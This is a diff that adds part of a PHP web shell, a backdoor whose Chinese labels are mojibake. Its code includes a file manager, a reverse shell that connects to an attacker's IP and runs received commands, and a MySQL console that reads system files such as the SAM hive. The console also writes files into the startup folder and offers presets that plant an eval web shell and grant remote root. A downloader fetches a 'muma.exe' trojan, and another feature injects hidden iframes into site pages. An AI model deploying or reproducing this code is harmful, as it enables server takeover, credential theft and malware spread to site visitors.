+			html_n("<a href=\"#\" onClick=\"rusurechk('$dirs','?eanver=rename&p=$dirpath&newname=');return false;\">����</a>");
+			html_n("<a href=\"#\" onClick=\"rusuredel('$dirs','?eanver=deltree&p=$dirpath');return false;\">ɾ��</a> ");
+			html_a('?pack='.$dirpath,'���');
+			html_n('</td><td align="center">');
+			html_a('?eanver=perm&p='.$dirpath.'&chmod='.$perm,$perm);
+			html_n('</td><td align="center">'.$filetime.'</td><td align="right">');
+			html_n('</td></tr>');
+			$NUM_D++;
+		}
+	}
+	@$dir->rewind();
+	while($files = @$dir->read()){
+		if($files == '.' or $files == '..') continue;
+		$filepath = str_path("$path/$files");
+		if(!is_dir($filepath)){
+			$fsize = @filesize($filepath);
+			$fsize = File_Size($fsize);
+			$perm  = substr(base_convert(fileperms($filepath),10,8),-4);
+			$filetime = @date('Y-m-d H:i:s',@filemtime($filepath));
+			$Fileurls = str_replace(File_Str($ROOT_DIR.'/'),$GETURL,$filepath);
+			$todir=$ROOT_DIR.'/zipfile';
+			$filepath = urlencode($filepath);
+			$it=substr($filepath,-3);
+			html_n('<tr height="25"><td><input type="checkbox" name="files[]" value="'.$files.'">');
+			html_img(css_showimg($files));
+			html_a($Fileurls,$files);
+			html_n('</td><td align="center">');
+            if(($it=='.gz') or ($it=='zip') or ($it=='tar') or ($it=='.7z'))
+			   html_a('?unzip='.$filepath,'��ѹ','title="��ѹ'.$files.'" onClick="rusurechk(\''.$todir.'\',\'?unzip='.$filepath.'&todir=\');return false;"');
+			else
+               html_a('?eanver=editr&p='.$filepath,'�༭','title="�༭'.$files.'"');
+
+			html_n("<a href=\"#\" onClick=\"rusurechk('$files','?eanver=rename&p=$filepath&newname=');return false;\">����</a>");
+			html_n("<a href=\"#\" onClick=\"rusuredel('$files','?eanver=del&p=$filepath');return false;\">ɾ��</a> ");
+			html_n("<a href=\"#\" onClick=\"rusurechk('".urldecode($filepath)."','?eanver=copy&p=$filepath&newcopy=');return false;\">����</a>");
+			html_n('</td><td align="center">');
+			html_a('?eanver=perm&p='.$filepath.'&chmod='.$perm,$perm);
+			html_n('</td><td align="center">'.$filetime.'</td><td align="right">');
+			html_a('?down='.$filepath,$fsize,'title="����'.$files.'"');
+			html_n('</td></tr>');
+			$NUM_F++;
+		}
+	}
+	@$dir->close();
+	if(!$Filetime) $Filetime = gmdate('Y-m-d H:i:s',time() + 3600 * 8);
+print<<<END
+</table>
+<div class="actall"> <input type="hidden" id="actall" name="actall" value="undefined"> 
+<input type="hidden" id="inver" name="inver" value="undefined"> 
+<input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form);"> 
+<input type="button" value="����" onclick="SubmitUrl('������ѡ�ļ���·��: ','{$REAL_DIR}','a');return false;"> 
+<input type="button" value="ɾ��" onclick="Delok('��ѡ�ļ�','b');return false;"> 
+<input type="button" value="����" onclick="SubmitUrl('�޸���ѡ�ļ�����ֵΪ: ','0666','c');return false;"> 
+<input type="button" value="ʱ��" onclick="CheckDate('{$Filetime}','d');return false;"> 
+<input type="button" value="���" onclick="SubmitUrl('�����������ѡ�ļ�������Ϊ: ','{$_SERVER['SERVER_NAME']}.tar.gz','e');return false;">
+Ŀ¼({$NUM_D}) / �ļ�({$NUM_F})</div> 
+</form> 
+END;
+	break;
+	
+	case "editr":
+	css_js("2");
+	if(!empty($_POST['uploadt'])){
+		echo @copy($_FILES['upfilet']['tmp_name'],str_path($p.'/'.$_FILES['upfilet']['name'])) ? html_a("?eanver=main",$_FILES['upfilet']['name'].' '.$msg[2]) : msg($msg[3]);
+		die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.urlencode($p).'">');
+	}
+	if(!empty($_GET['redir'])){
+        $name=$_GET['name'];
+		$newdir = str_path($p.'/'.$name);
+		@mkdir($newdir,0777) ? html_a("?eanver=main",$name.' '.$msg[0]) : msg($msg[1]);
+		die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.urlencode($p).'">');
+	}
+
+	if(!empty($_GET['refile'])){
+        $name=$_GET['name'];
+		$jspath=urlencode($p.'/'.$name);
+		$pp = urlencode($p);
+		$p = str_path($p.'/'.$name);
+		$FILE_CODE = "";
+		$charset= 'GB2312';
+        $FILE_TIME =date('Y-m-d H:i:s',time()+3600*8);
+		if(@file_exists($p)) echo '����Ŀ¼����"ͬ��"�ļ�<br>';
+	}else{
+		$jspath=urlencode($p);
+		$FILE_TIME = date('Y-m-d H:i:s',filemtime($p));
+        $FILE_CODE=@file_get_contents($p);
+	     if (substr(PHP_VERSION,0,1)>=5){
+            if(empty($_GET['charset'])){
+			   if(TestUtf8($FILE_CODE)>1){$charset= 'UTF-8';$FILE_CODE = iconv("UTF-8","gb2312//IGNORE",$FILE_CODE);}else{$charset= 'GB2312';}
+			  }else{
+			   if($_GET['charset']=='GB2312'){$charset= 'GB2312';}else{$charset= $_GET['charset'];$FILE_CODE = iconv($_GET['charset'],"gb2312//IGNORE",$FILE_CODE);}
+			  }
+		  }
+        $FILE_CODE = htmlspecialchars($FILE_CODE);
+	}
+print<<<END
+<div class="actall">��������: <input name="searchs" type="text" value="{$dim}" style="width:500px;">
+<input type="button" value="����" onclick="search(searchs.value)"></div>
+<form method='POST' id="editor"  action='?eanver=main&path={$pp}'>
+<div class="actall">
+<input type="text" name="newfile"  id="newfile" value="{$p}" style="width:750px;">ָ�����룺<input name="charset" id="charset" value="{$charset}" Type="text" style="width:80px;" onkeydown="if(event.keyCode==13)window.location='?eanver=editr&p={$jspath}&charset='+this.value;">
+<input type="button" value="ѡ��" onclick="window.location='?eanver=editr&p={$jspath}&charset='+this.form.charset.value;" style="width:50px;"> 
+END;
+html_select(array("GB2312" => "GB2312","UTF-8" => "UTF-8","BIG5" => "BIG5","EUC-KR" => "EUC-KR","EUC-JP" => "EUC-JP","SHIFT-JIS" => "SHIFT-JIS","WINDOWS-874" => "WINDOWS-874","ISO-8859-1" => "ISO-8859-1"),$charset,"onchange=\"window.location='?eanver=editr&p={$jspath}&charset='+options[selectedIndex].value;\"");
+print<<<END
+</div>
+<div class="actall"><textarea name="txt" style="width:100%;height:380px;">{$FILE_CODE}</textarea></div>
+<div class="actall">�ļ��޸�ʱ�� <input type="text" name="time" id="mtime" value="{$FILE_TIME}" style="width:150px;"> <input type="checkbox" name="bin" value="wb+" size="" checked>�Զ�������ʽ�����ļ�(����ʹ��)</div>
+<div class="actall"><input type="button" value="����" onclick="CheckDate();" style="width:80px;"> <input name='reset' type='reset' value='����'> 
+<input type="button" value="����" onclick="window.location='?eanver=main&path={$pp}';" style="width:80px;"></div>
+</form>
+END;
+	break;
+	
+	case "rename":
+	html_n("<tr><td>");
+	$newname = urldecode($pp).'/'.urlencode($_GET['newname']);
+	@rename($p,$newname) ? html_a("?eanver=main&path=$pp",urlencode($_GET['newname']).' '.$msg[4]) : msg($msg[5]);
+	die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">');
+	break;
+	
+	case "deltree":
+	html_n("<tr><td>");
+	do_deltree($p) ? html_a("?eanver=main&path=$pp",$p.' '.$msg[6]) : msg($msg[7]);
+	die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">');
+	break;
+	
+	case "del":
+	html_n("<tr><td>");
+	@unlink($p) ? html_a("?eanver=main&path=$pp",$p.' '.$msg[6]) : msg($msg[7]);
+	die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">');
+	break;
+	
+	case "copy":
+	html_n("<tr><td>");
+	$newpath = explode('/',$_GET['newcopy']);
+	$pathr[0] = $newpath[0];
+	for($i=1;$i < count($newpath);$i++){
+		$pathr[] = urlencode($newpath[$i]);
+	}
+	$newcopy = implode('/',$pathr);
+	@copy($p,$newcopy) ? html_a("?eanver=main&path=$pp",$newcopy.' '.$msg[4]) : msg($msg[5]);
+	die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">');
+	break;
+	
+	case "perm":
+	html_n("<form method='POST'><tr><td>".$p.' ����Ϊ: ');
+	if(is_dir($p)){
+		html_select(array("0777" => "0777","0755" => "0755","0555" => "0555"),$_GET['chmod']);
+	}else{
+		html_select(array("0666" => "0666","0644" => "0644","0444" => "0444"),$_GET['chmod']);
+	}
+	html_input("submit","save","�޸�");
+	back();
+	if($_POST['class']){
+		switch($_POST['class']){
+			case "0777": $change = @chmod($p,0777); break;
+			case "0755": $change = @chmod($p,0755); break;
+			case "0555": $change = @chmod($p,0555); break;
+			case "0666": $change = @chmod($p,0666); break;
+			case "0644": $change = @chmod($p,0644); break;
+			case "0444": $change = @chmod($p,0444); break;
+		}
+		$change ? html_a("?eanver=main&path=$pp",$msg[4]) : msg($msg[5]);
+		die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">');
+	}
+	html_n("</td></tr></form>");
+	break;
+
+    case "info_f":
+	$dis_func = get_cfg_var("disable_functions");
+	$upsize = get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "�������ϴ�";
+	$adminmail = (isset($_SERVER['SERVER_ADMIN'])) ? "<a href=\"mailto:".$_SERVER['SERVER_ADMIN']."\">".$_SERVER['SERVER_ADMIN']."</a>" : "<a href=\"mailto:".get_cfg_var("sendmail_from")."\">".get_cfg_var("sendmail_from")."</a>";
+	if($dis_func == ""){$dis_func = "No";}else{$dis_func = str_replace(" ","<br>",$dis_func);$dis_func = str_replace(",","<br>",$dis_func);}
+	$phpinfo = (!eregi("phpinfo",$dis_func)) ? "Yes" : "No";
+	$info = array(
+		array("������ʱ��",date("Y��m��d�� h:i:s",time())),
+		array("����������","<a href=\"http://".$_SERVER['SERVER_NAME']."\" target=\"_blank\">".$_SERVER['SERVER_NAME']."</a>"),
+		array("������IP��ַ",gethostbyname($_SERVER['SERVER_NAME'])),
+		array("����������ϵͳ",PHP_OS),
+		array("����������ϵͳ���ֱ���",$_SERVER['HTTP_ACCEPT_LANGUAGE']),
+		array("��������������",$_SERVER['SERVER_SOFTWARE']),
+		array("���IP",$_SERVER["REMOTE_ADDR"]),
+		array("Web����˿�",$_SERVER['SERVER_PORT']),
+		array("PHP���з�ʽ",strtoupper(php_sapi_name())),
+		array("PHP�汾",PHP_VERSION),
+		array("�����ڰ�ȫģʽ",Info_Cfg("safemode")),
+		array("����������Ա",$adminmail),
+		array("���ļ�·��",myaddress),
+		array("����ʹ�� URL ���ļ� allow_url_fopen",Info_Cfg("allow_url_fopen")),
+		array("����ʹ��curl_exec",Info_Fun("curl_exec")),
+		array("������̬�������ӿ� enable_dl",Info_Cfg("enable_dl")),
+		array("��ʾ������Ϣ display_errors",Info_Cfg("display_errors")),
+		array("�Զ�����ȫ�ֱ��� register_globals",Info_Cfg("register_globals")),
+		array("magic_quotes_gpc",Info_Cfg("magic_quotes_gpc")),
+		array("�����������ʹ���ڴ��� memory_limit",Info_Cfg("memory_limit")),
+		array("POST����ֽ��� post_max_size",Info_Cfg("post_max_size")),
+		array("��������ϴ��ļ� upload_max_filesize",$upsize),
+		array("���������ʱ�� max_execution_time",Info_Cfg("max_execution_time")."��"),
+		array("�����õĺ��� disable_functions",$dis_func),
+		array("phpinfo()",$phpinfo),
+		array("Ŀǰ���п���ռ�diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'),
+		array("ͼ�δ��� GD Library",Info_Fun("imageline")),
+		array("IMAP�����ʼ�ϵͳ",Info_Fun("imap_close")),
+		array("MySQL���ݿ�",Info_Fun("mysql_close")),
+		array("SyBase���ݿ�",Info_Fun("sybase_close")),
+		array("Oracle���ݿ�",Info_Fun("ora_close")),
+		array("Oracle 8 ���ݿ�",Info_Fun("OCILogOff")),
+		array("PREL�����﷨ PCRE",Info_Fun("preg_match")),
+		array("PDF�ĵ�֧��",Info_Fun("pdf_close")),
+		array("Postgre SQL���ݿ�",Info_Fun("pg_close")),
+		array("SNMP���������",Info_Fun("snmpget")),
+		array("ѹ���ļ�֧��(Zlib)",Info_Fun("gzclose")),
+		array("XML����",Info_Fun("xml_set_object")),
+		array("FTP",Info_Fun("ftp_login")),
+		array("ODBC���ݿ�����",Info_Fun("odbc_close")),
+		array("Session֧��",Info_Fun("session_start")),
+		array("Socket֧��",Info_Fun("fsockopen")),
+	);
+	$shell = new COM("WScript.Shell") or die("This thing requires Windows Scripting Host");
+	echo '<table width="100%" border="0">';
+	for($i = 0;$i < count($info);$i++){echo '<tr><td width="40%">'.$info[$i][0].'</td><td>'.$info[$i][1].'</td></tr>'."\n";}
+try{$registry_proxystring = $shell->RegRead("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\PortNumber");
+$Telnet = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\TelnetServer\\1.0\\TelnetPort");
+$PcAnywhere = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Symantec\\pcAnywhere\\CurrentVersion\\System\\TCPIPDataPort");
+}catch(Exception $e){}
+    echo '<tr><td width="40%">Terminal Service�˿�Ϊ</td><td>'.$registry_proxystring.'</td></tr>'."\n";
+	echo '<tr><td width="40%">Telnet�˿�Ϊ</td><td>'.$Telnet.'</td></tr>'."\n";
+	echo '<tr><td width="40%">PcAnywhere�˿�Ϊ</td><td>'.$PcAnywhere.'</td></tr>'."\n";
+	echo '</table>';
+	break;
+
+	case "nc":
+	$M_ip = isset($_POST['mip']) ? $_POST['mip'] : $_SERVER["REMOTE_ADDR"];
+	$B_port = isset($_POST['bport']) ? $_POST['bport'] : '1019';
+print<<<END
+<form method="POST">
+<div class="actall">ʹ�÷�����<br>
+			�����Լ���������"nc -l -p 1019"<br>
+			Ȼ���ڴ���д����Ե�IP,�����ӣ�</div>
+<div class="actall">���IP <input type="text" name="mip" value="{$M_ip}" style="width:100px;"> �˿ں� <input type="text" name="bport" value="{$B_port}" style="width:50px;"></div>
+<div class="actall"><input type="submit" value="����" style="width:80px;"></div>
+</form>
+END;
+	if((!empty($_POST['mip'])) && (!empty($_POST['bport'])))
+	{
+	echo '<div class="actall">';
+		 $mip=$_POST['mip'];
+		 $bport=$_POST['bport'];
+		 $fp=fsockopen($mip , $bport , $errno, $errstr);
+		 if (!$fp){
+		     $result = "Error: could not open socket connection";
+		    }else {
+		 fputs ($fp ,"\n*********************************************\n 
+		              hacking url:http://www.mumasec.tk/ is ok!        
+			          \n*********************************************\n\n");
+	     while(!feof($fp)){ 
+         fputs ($fp," [r00t@H4c3ing:/root]# ");
+         $result= fgets ($fp, 4096);
+         $message=`$result`;
+         fputs ($fp,"--> ".$message."\n");
+                          }
+         fclose ($fp);
+		       }
+    echo '</div>';
+    }
+	break;
+
+
+	case "sqlshell":
+	$MSG_BOX = '';
+	$mhost = 'localhost'; $muser = 'root'; $mport = '3306'; $mpass = ''; $mdata = 'mysql'; $msql = 'select version();';
+	if(isset($_POST['mhost']) && isset($_POST['muser']))
+	{
+		$mhost = $_POST['mhost']; $muser = $_POST['muser']; $mpass = $_POST['mpass']; $mdata = $_POST['mdata']; $mport = $_POST['mport'];
+		if($conn = mysql_connect($mhost.':'.$mport,$muser,$mpass)) @mysql_select_db($mdata);
+		else $MSG_BOX = '����MYSQLʧ��';
+	}
+	$downfile = 'c:/windows/repair/sam';
+	if(!empty($_POST['downfile']))
+	{
+		$downfile = File_Str($_POST['downfile']);
+		$binpath = bin2hex($downfile);
+		$query = 'select load_file(0x'.$binpath.')';
+		if($result = @mysql_query($query,$conn))
+		{
+			$k = 0; $downcode = '';
+			while($row = @mysql_fetch_array($result)){$downcode .= $row[$k];$k++;}
+			$filedown = basename($downfile);
+			if(!$filedown) $filedown = 'envl.tmp';
+			$array = explode('.', $filedown);
+			$arrayend = array_pop($array);
+			header('Content-type: application/x-'.$arrayend);
+			header('Content-Disposition: attachment; filename='.$filedown);
+			header('Content-Length: '.strlen($downcode));
+			echo $downcode;
+			exit;
+		}
+		else $MSG_BOX = '�����ļ�ʧ��';
+	}
+	$o = isset($_GET['o']) ? $_GET['o'] : '';
+print<<<END
+<form method="POST" name="nform" id="nform">
+<center><div class="actall"><a href="?eanver=sqlshell">[MYSQLִ�����]</a> 
+<a href="?eanver=sqlshell&o=u">[MYSQL�ϴ��ļ�]</a> 
+<a href="?eanver=sqlshell&o=d">[MYSQL�����ļ�]</a></div>
+<div class="actall">
+��ַ <input type="text" name="mhost" value="{$mhost}" style="width:110px">
+�˿� <input type="text" name="mport" value="{$mport}" style="width:110px">
+�û� <input type="text" name="muser" value="{$muser}" style="width:110px">
+���� <input type="text" name="mpass" value="{$mpass}" style="width:110px">
+���� <input type="text" name="mdata" value="{$mdata}" style="width:110px">
+</div>
+<div class="actall" style="height:220px;">
+END;
+if($o == 'u')
+{
+	$uppath = 'C:/Documents and Settings/All Users/����ʼ���˵�/����/����/exp.vbs';
+	if(!empty($_POST['uppath']))
+	{
+		$uppath = $_POST['uppath'];
+		$query = 'Create TABLE a (cmd text NOT NULL);';
+		if(@mysql_query($query,$conn))
+		{
+			if($tmpcode = File_Read($_FILES['upfile']['tmp_name'])){$filecode = bin2hex(File_Read($tmpcode));}
+			else{$tmp = File_Str(dirname(myaddress)).'/upfile.tmp';if(File_Up($_FILES['upfile']['tmp_name'],$tmp)){$filecode = bin2hex(File_Read($tmp));@unlink($tmp);}}
+			$query = 'Insert INTO a (cmd) VALUES(CONVERT(0x'.$filecode.',CHAR));';
+			if(@mysql_query($query,$conn))
+			{
+				$query = 'SELECT cmd FROM a INTO DUMPFILE \''.$uppath.'\';';
+				$MSG_BOX = @mysql_query($query,$conn) ? '�ϴ��ļ��ɹ�' : '�ϴ��ļ�ʧ��';
+			}
+			else $MSG_BOX = '������ʱ��ʧ��';
+			@mysql_query('Drop TABLE IF EXISTS a;',$conn);
+		}
+		else $MSG_BOX = '������ʱ��ʧ��';
+	}
+print<<<END
+<br><br>�ϴ�·�� <input type="text" name="uppath" value="{$uppath}" style="width:500px">
+<br><br>ѡ���ļ� <input type="file" name="upfile" style="width:500px;height:22px;">
+</div><div class="actall"><input type="submit" value="�ϴ�" style="width:80px;">
+END;
+}
+elseif($o == 'd')
+{
+print<<<END
+<br><br><br>�����ļ� <input type="text" name="downfile" value="{$downfile}" style="width:500px">
+</div><div class="actall"><input type="submit" value="����" style="width:80px;">
+END;
+}
+else
+{
+	if(!empty($_POST['msql']))
+	{
+		$msql = $_POST['msql'];
+		if($result = @mysql_query($msql,$conn))
+		{
+			$MSG_BOX = 'ִ��SQL���ɹ�<br>';
+			$k = 0;
+			while($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;}
+		}
+		else $MSG_BOX .= mysql_error();
+	}
+print<<<END
+<script language="javascript">
+function nFull(i){
+	Str = new Array(11);
+	Str[0] = "select version();";
+	Str[1] = "select load_file(0x633A5C5C77696E646F77735C73797374656D33325C5C696E65747372765C5C6D657461626173652E786D6C) FROM user into outfile 'D:/web/iis.txt'";
+	Str[2] = "select '<?php eval(\$_POST[cmd]);?>' into outfile 'F:/web/bak.php';";
+	Str[3] = "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;";
+	nform.msql.value = Str[i];
+	return true;
+}
+</script>
+<textarea name="msql" style="width:700px;height:200px;">{$msql}</textarea></div>
+<div class="actall">
+<select onchange="return nFull(options[selectedIndex].value)">
+	<option value="0" selected>��ʾ�汾</option>
+	<option value="1">�����ļ�</option>
+	<option value="2">д���ļ�</option>
+	<option value="3">��������</option>
+</select>
+<input type="submit" value="ִ��" style="width:80px;">
+END;
+}
+	if($MSG_BOX != '') echo '</div><div class="actall">'.$MSG_BOX.'</div></center></form>';
+	else echo '</div></center></form>';
+	break;
+	
+    case "downloader":
+	$Com_durl = isset($_POST['durl']) ? $_POST['durl'] : 'http://www.baidu.com/down/muma.exe';
+	$Com_dpath= isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(myaddress).'/muma.exe');
+print<<<END
+	<form method="POST">
+    <div class="actall">������ <input name="durl" value="{$Com_durl}" type="text" style="width:600px;"></div>
+    <div class="actall">���ص� <input name="dpath" value="{$Com_dpath}" type="text" style="width:600px;"></div>
+    <div class="actall"><input value="����" type="submit" style="width:80px;"></div></form>
+END;
+	if((!empty($_POST['durl'])) && (!empty($_POST['dpath'])))
+	{
+		echo '<div class="actall">';
+		$contents = @file_get_contents($_POST['durl']);
+		if(!$contents) echo '�޷���ȡҪ���ص�����';
+		else echo File_Write($_POST['dpath'],$contents,'wb') ? '�����ļ��ɹ�' : '�����ļ�ʧ��';
+		echo '</div>';
+	}
+	break;
+
+	case "issql":
+	session_start();
+  if($_POST['sqluser'] && $_POST['sqlpass']){
+    $_SESSION['sql_user'] = $_POST['sqluser'];
+    $_SESSION['sql_password'] = $_POST['sqlpass'];
+  }
+  if($_POST['sqlhost']){$_SESSION['sql_host'] = $_POST['sqlhost'];}
+  else{$_SESSION['sql_host'] = 'localhost';}
+  if($_POST['sqlport']){$_SESSION['sql_port'] = $_POST['sqlport'];}
+  else{$_SESSION['sql_port'] = '3306';}
+  if($_SESSION['sql_user'] && $_SESSION['sql_password']){
+    if(!($sqlcon = @mysql_connect($_SESSION['sql_host'].':'.$_SESSION['sql_port'],$_SESSION['sql_user'],$_SESSION['sql_password']))){
+      unset($_SESSION['sql_user'], $_SESSION['sql_password'], $_SESSION['sql_host'], $_SESSION['sql_port']);
+      die(html_a('?eanver=sqlshell','����ʧ���뷵��'));
+    }
+  }
+  else{
+    die(html_a('?eanver=sqlshell','����ʧ���뷵��'));
+  }
+  $query = mysql_query("SHOW DATABASES",$sqlcon);
+  html_n('<tr><td>���ݿ��б�:');
+  while($db = mysql_fetch_array($query)) {
+		html_a('?eanver=issql&db='.$db['Database'],$db['Database']);
+		echo '&nbsp;&nbsp;';
+	}
+  html_n('</td></tr>');
+  if($_GET['db']){
+  	css_js("3");
+    mysql_select_db($_GET['db'], $sqlcon);
+    html_n('<tr><td><form method="POST" name="DbForm"><textarea name="sql" COLS="80" ROWS="3">'.$_POST['sql'].'</textarea><br>');
+    html_select(array(0=>"--SQL�﷨--",7=>"��������",8=>"ɾ������",9=>"�޸�����",10=>"�����ݱ�",11=>"ɾ���ݱ�",12=>"�����ֶ�",13=>"ɾ���ֶ�"),0,"onchange='return Full(options[selectedIndex].value)'");
+    html_input("submit","doquery","ִ��");
+    html_a("?eanver=issql&db=".$_GET['db'],$_GET['db']);
+    html_n('--->');
+    html_a("?eanver=issql&db=".$_GET['db']."&table=".$_GET['table'],$_GET['table']);
+    html_n('</form><br>');
+  	if(!empty($_POST['sql'])){
+			if (@mysql_query($_POST['sql'],$sqlcon)) {
+				echo "ִ��SQL���ɹ�";
+			}else{
+				echo "����: ".mysql_error();
+			}
+  	}
+    if($_GET['table']){
+      html_n('<table border=1><tr>');
+      $query = "SHOW COLUMNS FROM ".$_GET['table'];
+      $result = mysql_query($query,$sqlcon);
+      $fields = array();
+      while($row = mysql_fetch_assoc($result)){
+        array_push($fields,$row['Field']);
+        html_n('<td><font color=#FFFF44>'.$row['Field'].'</font></td>');
+      }
+      html_n('</tr><tr>');
+      $result = mysql_query("SELECT * FROM ".$_GET['table'],$sqlcon) or die(mysql_error());
+      while($text = @mysql_fetch_assoc($result)){
+      	foreach($fields as $row){
+      		if($text[$row] == "") $text[$row] = 'NULL';
+      		html_n('<td>'.$text[$row].'</td>');
+      	}
+      	echo '</tr>';
+      }
+    }
+    else{
+      $query = "SHOW TABLES FROM " . $_GET['db'];
+      $dat = mysql_query($query, $sqlcon) or die(mysql_error());
+      while ($row = mysql_fetch_row($dat)){
+        html_n("<tr><td><a href='?eanver=issql&db=".$_GET['db']."&table=".$row[0]."'>".$row[0]."</a></td></tr>");
+      }
+    }
+  }
+	break;
+	
+	case "upfiles":
+	html_n('<tr><td>�����������ϴ������ļ���С: '.@get_cfg_var('upload_max_filesize').'<form method="POST" enctype="multipart/form-data">');
+	html_input("text","uppath",root_dir,"<br>�ϴ���·��: ","51");
+print<<<END
+<SCRIPT language="JavaScript">
+function addTank(){
+var k=0;
+  k=k+1;
+  k=tank.rows.length;
+  newRow=document.all.tank.insertRow(-1)
+  <!--ɾ��ѡ��-->
+  newcell=newRow.insertCell()
+  newcell.innerHTML="<input name='tankNo' type='checkbox'> <input type='file' name='upfile[]' value='' size='50'>"
+}
+
+function delTank() {
+  if(tank.rows.length==1) return;
+  var checkit = false;
+  for (var i=0;i<document.all.tankNo.length;i++) {
+    if (document.all.tankNo[i].checked) {
+      checkit=true;
+      tank.deleteRow(i+1);
+      i--;
+    }
+  }
+  if (checkit) {
+  } else{
+    alert("��ѡ��һ��Ҫɾ���Ķ���");
+    return false;
+  }
+}
+</SCRIPT>
+<br><br>
+<table cellSpacing=0 cellPadding=0 width="100%" border=0>       
+          <tr>
+            <td width="7%"><input class="button01" type="button"  onclick="addTank()" value=" �� �� " name="button2"/>
+            <input name="button3"  type="button" class="button01" onClick="delTank()" value="ɾ��" />
+            </td>
+          </tr>
+</table>
+<table  id="tank" width="100%" border="0" cellpadding="1" cellspacing="1" >
+<tr><td>��ѡ��Ҫ�ϴ����ļ���</td></tr>
+<tr><td><input name='tankNo' type='checkbox'> <input type='file' name='upfile[]' value='' size='50'></td></tr>
+</table>
+END;
+	html_n('<br><input type="submit" name="upfiles" value="�ϴ�" style="width:80px;"> <input type="button" value="����" onclick="window.location=\'?eanver=main&path='.root_dir.'\';" style="width:80px;">');
+	if($_POST['upfiles']){
+		foreach ($_FILES["upfile"]["error"] as $key => $error){
+			if ($error == UPLOAD_ERR_OK){
+				$tmp_name = $_FILES["upfile"]["tmp_name"][$key];
+				$name = $_FILES["upfile"]["name"][$key];
+				$uploadfile = str_path($_POST['uppath'].'/'.$name);
+				$upload = @copy($tmp_name,$uploadfile) ? $name.$msg[2] : @move_uploaded_file($tmp_name,$uploadfile) ? $name.$msg[2] : $name.$msg[3];
+				echo '<br><br>'.$upload;
+			}
+		}
+	}
+	html_n('</form>');
+	break;
+	
+	case "guama":
+	$patht = isset($_POST['path']) ? $_POST['path'] : root_dir;
+	$typet = isset($_POST['type']) ? $_POST['type'] : ".html|.shtml|.htm|.asp|.php|.jsp|.cgi|.aspx";
+	$codet = isset($_POST['code']) ? $_POST['code'] : "<iframe src=\"http://localhost/eanver.htm\" width=\"1\" height=\"1\"></iframe>";
+	html_n('<tr><td>�ļ���������"|"����,Ҳ������ָ���ļ���.<form method="POST"><br>');
+	html_input("text","path",$patht,"·����Χ","45");
+	html_input("checkbox","pass","","ʹ��Ŀ¼����","",true);
+	html_input("text","type",$typet,"<br><br>�ļ�����","60");
+	html_text("code","67","5",$codet);
+	html_n('<br><br>');
+	html_radio("��������","��������","guama","qingma");
+	html_input("submit","passreturn","��ʼ");
+	html_n('</td></tr></form>');
+	if(!empty($_POST['path'])){
+		html_n('<tr><td>Ŀ���ļ�:<br><br>');
+		if(isset($_POST['pass'])) $bool = true; else $bool = false;
+		do_passreturn($patht,$codet,$_POST['return'],$bool,$typet);
+	}
+	break;
+	
+	case "tihuan":
+	html_n('<tr><td>�˹��ܿ������滻�ļ�����,��С��ʹ��.<br><br><form method="POST">');
+	html_input("text","path",root_dir,"·����Χ","45");
+	html_input("checkbox","pass","","ʹ��Ŀ¼����","",true);
+	html_text("newcode","67","5",$_POST['newcode']);
+	html_n('<br><br>�滻Ϊ');
+	html_text("oldcode","67","5",$_POST['oldcode']);
+	html_input("submit","passreturn","�滻","<br><br>");
+	html_n('</td></tr></form>');
+	if(!empty($_POST['path'])){
+		html_n('<tr><td>Ŀ���ļ�:<br><br>');
+		if(isset($_POST['pass'])) $bool = true; else $bool = false;
+		do_passreturn($_POST['path'],$_POST['newcode'],"tihuan",$bool,$_POST['oldcode']);
+	}
+	break;
+	
+	case "scanfile":
+	css_js("4");
+	html_n('<tr><td>�˹��ܿɺܷ��������������MYSQL�û�����������ļ�,������Ȩ.<br>���������ļ�̫��ʱ,��Ӱ��ִ���ٶ�,������ʹ��Ŀ¼����.<form method="POST" name="sform"><br>');
+	html_input("text","path",root_dir,"·����","45");
+	html_input("checkbox","pass","","ʹ��Ŀ¼����","",true);
+	html_input("text","code",$_POST['code'],"<br><br>�ؼ���","40");
+	html_select(array("--MYSQL�����ļ�--","Discuz","PHPWind","phpcms","dedecms","PHPBB","wordpress","sa-blog","o-blog"),0,"onchange='return Fulll(options[selectedIndex].value)'");
+	html_n('<br><br>');
+	html_radio("�����ļ���","������������","scanfile","scancode");
+	html_input("submit","passreturn","����");
+	html_n('</td></tr></form>');
+	if(!empty($_POST['path'])){
+		html_n('<tr><td>�ҵ��ļ�:<br><br>');
+		if(isset($_POST['pass'])) $bool = true; else $bool = false;
+		do_passreturn($_POST['path'],$_POST['code'],$_POST['return'],$bool);
+	}
+	break;
+	
+	case "scanphp":
+	html_n('<tr><td>ԭ���Ǹ��������붨���,��鿴�����жϺ��ٽ���ɾ��.<form method="POST"><br>');
+	html_input("text","path",root_dir,"���ҷ�Χ","40");
+	html_input("checkbox","pass","","ʹ��Ŀ¼����<br><br>�ű�����","",true);
+	html_select(array("php" => "PHP","asp" => "ASP","aspx" => "ASPX","jsp" => "JSP"));
+	html_input("submit","passreturn","����","<br><br>");
+	html_n('</td></tr></form>');
+	if(!empty($_POST['path'])){
+		html_n('<tr><td>�ҵ��ļ�:<br><br>');
+		if(isset($_POST['pass'])) $bool = true; else $bool = false;
+		do_passreturn($_POST['path'],$_POST['class'],"scanphp",$bool);
+	}
+	break;
+	
+	case "port":
+	$Port_ip = isset($_POST['ip']) ? $_POST['ip'] : '127.0.0.1';
+	$Port_port = isset($_POST['port']) ? $_POST['port'] : '21|23|25|80|110|135|139|445|1433|3306|3389|43958|5631';
+print<<<END
